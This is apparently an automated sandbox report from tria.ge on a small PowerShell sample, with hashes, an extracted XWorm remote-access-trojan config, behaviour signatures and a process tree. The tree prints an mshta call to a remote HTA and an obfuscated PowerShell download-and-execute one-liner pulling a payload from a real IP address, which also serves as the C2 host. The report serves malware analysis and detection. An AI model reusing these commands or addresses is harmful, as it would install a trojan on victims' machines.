Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    97s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/11/2024, 15:47

General

  • Target

    prueba.ps1

  • Size

    124B

  • MD5

    6542fcabb69f2e45e5abb6ef369d6b4b

  • SHA1

    a9e758873a6c57d87b7e3bf02cfc04be6959d59b

  • SHA256

    fd4dd13239fcd0e3171711951768b399b1b2210af3e6b4f7cc1c0a594bff7133

  • SHA512

    6f9a75d4e17909c0dea87683bec1286964b8b21db927650c72db8b33df37b07a16b84bd56db42a5055e20c1895821b541467812dc03d5cefb4a144cebb2afb26

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://185.147.124.40/Capcha.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.147.124.40/x/8.png

Extracted

Family

xworm

C2

185.147.124.40:4404

Attributes
  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\prueba.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.147.124.40/Capcha.html
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\system32\ipconfig.exe
          "C:\Windows\system32\ipconfig.exe" /flushdns
          4⤵
          • Gathers network information
          PID:3860
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4088

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfnhg5as.1ub.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1260-11-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

  • memory/1260-12-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

  • memory/1260-16-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

  • memory/1260-0-0x00007FFA71813000-0x00007FFA71815000-memory.dmp

    Filesize

    8KB

  • memory/1260-10-0x0000018522090000-0x00000185220B2000-memory.dmp

    Filesize

    136KB

  • memory/2584-29-0x000001D060D70000-0x000001D060D8A000-memory.dmp

    Filesize

    104KB

  • memory/2584-30-0x000001D047D80000-0x000001D047D86000-memory.dmp

    Filesize

    24KB

  • memory/4088-31-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/4088-33-0x00000000054C0000-0x000000000555C000-memory.dmp

    Filesize

    624KB

  • memory/4088-34-0x0000000005BB0000-0x0000000005C16000-memory.dmp

    Filesize

    408KB

  • memory/4088-35-0x0000000006590000-0x0000000006622000-memory.dmp

    Filesize

    584KB

  • memory/4088-36-0x0000000006BE0000-0x0000000007184000-memory.dmp

    Filesize

    5.6MB